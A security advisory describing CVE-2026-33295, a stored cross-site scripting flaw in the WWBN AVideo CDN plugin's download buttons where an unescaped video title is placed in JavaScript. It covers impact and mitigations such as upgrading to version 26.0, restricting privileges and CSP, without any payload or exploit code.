CVE-2026-33295 is a stored cross-site scripting vulnerability identified in the WWBN AVideo open-source video platform, specifically in versions before 26.0. The vulnerability resides in the CDN plugin's download buttons component, where the clean_title field of a video record is interpolated directly into a JavaScript string literal without any sanitization or escaping. This improper neutralization of input (CWE-79) allows an attacker who has the capability to create or modify video entries to inject arbitrary JavaScript code. When other users visit the affected download page, the malicious script executes in their browsers under the context of the vulnerable site, potentially leading to theft of cookies, session tokens, or performing actions on behalf of the user. The CVSS 4.0 base score is 8.2 (high), reflecting network attack vector, low attack complexity, no privileges required beyond video modification rights, and user interaction needed. The vulnerability has a high impact on confidentiality due to potential data theft and a high scope due to affecting all users visiting the compromised page. No known exploits are reported in the wild yet, but the risk is significant given the ease of exploitation and the sensitive nature of video platforms. The issue is resolved in AVideo version 26.0 by implementing proper escaping of the clean_title field before embedding it into JavaScript code.

The impact of CVE-2026-33295 is substantial for organizations using WWBN AVideo versions prior to 26.0. Successful exploitation allows attackers to execute arbitrary JavaScript in the browsers of users visiting the affected download pages, potentially leading to session hijacking, credential theft, unauthorized actions, or distribution of malware. This can compromise user accounts, damage organizational reputation, and lead to data breaches. Since video platforms often have a broad user base, the scope of impact can be wide, affecting both internal users and external customers. Additionally, attackers with low privileges (video creators or editors) can leverage this vulnerability to escalate their influence, making it a critical risk in multi-user environments. The vulnerability also poses risks to organizations relying on AVideo for content delivery, as it can be used to inject malicious scripts that propagate through trusted platforms.

To mitigate CVE-2026-33295, organizations should immediately upgrade WWBN AVideo to version 26.0 or later, where the vulnerability is fixed by proper escaping of the clean_title field. Until upgrading is possible, administrators should restrict video creation and modification privileges to trusted users only, minimizing the risk of malicious input. Implementing web application firewalls (WAFs) with rules to detect and block suspicious JavaScript injection attempts in video titles can provide temporary protection. Additionally, security teams should audit existing video records for suspicious or malicious content in the clean_title field and sanitize or remove any unsafe entries. Enabling Content Security Policy (CSP) headers can help mitigate the impact of injected scripts by restricting script execution sources. Regular monitoring of user activity and logs for unusual behavior related to video uploads or modifications is also recommended.